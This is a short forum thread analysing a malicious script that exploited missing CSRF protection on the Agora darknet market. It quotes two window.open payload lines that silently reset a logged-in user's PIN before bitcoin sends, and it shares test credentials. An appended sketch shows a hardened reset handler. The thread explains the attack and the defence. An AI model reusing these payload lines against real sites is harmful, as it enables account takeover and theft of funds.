by jawr 3974 days ago
The important bit seems to be in `window.onbeforeunload`

Looks like it tries to brute force a pin reset and then attempts to send a bunch of bitcoin sends.

I'm guessing it depends on the user running on Tor and still being logged in to http://sydneymfsnkpw7ln.onion, whatever that is?

1 comments

It doesn't have to brute force the reset because Agora requires knowledge of neither the current PIN nor the current account password to reset the PIN.

    window.open (url+"/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=", "_blank")

Starts the PIN reset process and

    window.open (url+"/resetpin?pin1=1111&pin2=1111&submit=Save", "_blank")

sets the new PIN. For reference, Agora is lauded as one of the most secure darknet markets. You can see the lack of CSRF protection for yourself with the credentials username::password::pin ggHNpinReset::qwertyuiop::1234
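For comparison, an added sketch (not part of the thread, and not any site's actual code) of a PIN-reset handler that rejects the kind of cross-site request discussed above: it accepts only POST, checks a session-bound CSRF token, and requires the current PIN. The function names, session layout and the `csrf_token` / `current_pin` fields are assumptions made for the illustration.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret; every name in this sketch is hypothetical.
SERVER_KEY = secrets.token_bytes(32)


def hash_pin(pin: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, 100_000)


def make_session(pin: str) -> dict:
    salt = secrets.token_bytes(16)
    return {"id": secrets.token_hex(16), "pin_salt": salt,
            "pin_hash": hash_pin(pin, salt)}


def issue_csrf_token(session_id: str) -> str:
    # Bound to the session: a third-party page can neither read nor compute it.
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def reset_pin(method: str, session: dict, form: dict) -> tuple:
    """Return (status, reason) for a PIN reset request."""
    # 1. State changes only via POST; a window.open() navigation is a GET.
    if method != "POST":
        return 405, "method not allowed"
    # 2. Session-bound CSRF token, compared in constant time.
    expected = issue_csrf_token(session["id"]).encode()
    if not hmac.compare_digest(expected, form.get("csrf_token", "").encode()):
        return 403, "bad csrf token"
    # 3. Re-authentication: the caller must know the current PIN.
    supplied = hash_pin(form.get("current_pin", ""), session["pin_salt"])
    if not hmac.compare_digest(supplied, session["pin_hash"]):
        return 403, "current pin incorrect"
    # 4. The two new-PIN fields must be present and equal.
    if not form.get("pin1") or form.get("pin1") != form.get("pin2"):
        return 400, "new pins do not match"
    session["pin_salt"] = secrets.token_bytes(16)
    session["pin_hash"] = hash_pin(form["pin1"], session["pin_salt"])
    return 200, "pin changed"
```
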